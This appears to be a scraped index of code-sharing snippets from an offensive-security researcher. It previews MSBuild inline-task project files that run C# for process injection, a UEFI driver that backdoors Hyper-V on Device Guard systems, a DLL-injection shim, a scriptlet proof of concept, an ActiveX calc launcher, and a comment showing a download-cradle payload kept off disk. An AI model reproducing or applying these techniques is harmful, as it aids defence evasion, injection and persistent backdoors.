View CertTBSHash.ps1
# Example: ls 'C:\Windows\System32\*' -Include '*.dll' | Get-AuthenticodeSignature | Select -ExpandProperty SignerCertificate | Get-TBSHash
filter Get-TBSHash {
param (
[Parameter(Mandatory, ValueFromPipeline)]
View msbuildQueueAPC.csproj
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!-- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
View levelup.csproj
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe levelup.csproj -->
<!-- Choose Framework based on Platform -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe levelup.csproj -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
View DmaHvBackdoor.c
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
View customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<name>John Smith</name>
<address>123 Elm St.</address>
<phone>(123) 456-7890</phone>
<name>Mary Jones</name>
View dllinjshim.cpp
-------- dllinjshim.cpp --------
> cl /Fe:dllinjshim.exe dllinjshim.cpp
> dllinjshim.exe
> sdbinst moo.sdb
View thing.sct
<?XML version="1.0"?>
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
View hh.html
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
View msbuilder.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
<!-- Populate the Env Var like this or many other ways: -->
<!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('') -->
<!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
<!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process -->
<Target Name="Hello">
<SharpLauncher >
View certutil.reg
Windows Registry Editor Version 5.00